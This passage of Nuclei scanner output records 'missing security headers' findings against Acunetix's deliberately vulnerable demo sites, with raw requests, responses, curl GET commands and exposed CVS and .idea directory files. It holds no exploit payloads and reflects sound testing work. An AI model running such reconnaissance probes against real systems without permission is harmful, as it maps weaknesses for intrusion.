HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:18.575804677Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:18.729608673Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.72961301Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.729695138Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:18.729718684Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:19.755889618Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: 